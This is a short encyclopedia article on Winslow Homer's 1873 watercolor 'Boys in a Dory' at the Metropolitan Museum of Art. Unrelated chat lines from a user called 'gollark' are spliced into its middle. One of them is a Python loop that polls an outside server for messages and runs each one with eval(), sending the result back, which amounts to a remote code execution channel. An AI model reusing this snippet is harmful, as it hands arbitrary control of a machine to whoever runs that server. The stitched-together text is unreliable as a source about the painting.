Boys in a Dory

Boys in a Dory is a mid 19th-century painting by American artist Winslow Homer. Done in watercolor and gouache on wove paper, the painting depicts a group of boys boating in a dory. Winslow's work is in the collection of the Metropolitan Museum of Art.

Boys in a Dory
ArtistWinslow Homer
Year1873
MediumWatercolor and gouache on graphite underdrawing and white wove paper
Dimensions24.8 cm × 35.2 cm (9.8 in × 13.9 in)
LocationMetropolitan Museum of Art, New York City
Accession2001.608.1

Description

Boys in a Dory is one of Homer's first watercolors. According to the Met's description of the painting, the artist's initial style of watercolors resulted in Boys being simple and direct.[1]

The painting was rendered by Homer while he was in Gloucester, Massachusetts.[1][2]

gollark: Imagine boosting this instead of the [REDACTED].
gollark: I don't think I ever go around *manually* fiddling with tree structures (unless you count source code, which could be represented various different ways).
gollark: It's basically an infinite 2D grid of bad computers with 256B of RAM.
gollark: I made a "usable" esolang, for certain definitions of "usable".
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: try: send(repr(eval(data["result"]["data"]))) except Exception as e: end(repr(e))```Here is a small version if you want that.

References

  1. "Boys in a Dory". www.metmuseum.org. Retrieved 2020-05-30.
  2. "Recent Acquisitions, A Selection: 2001–2002": The Metropolitan Museum of Art Bulletin, v. 60, no. 2 (Fall, 2002)
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.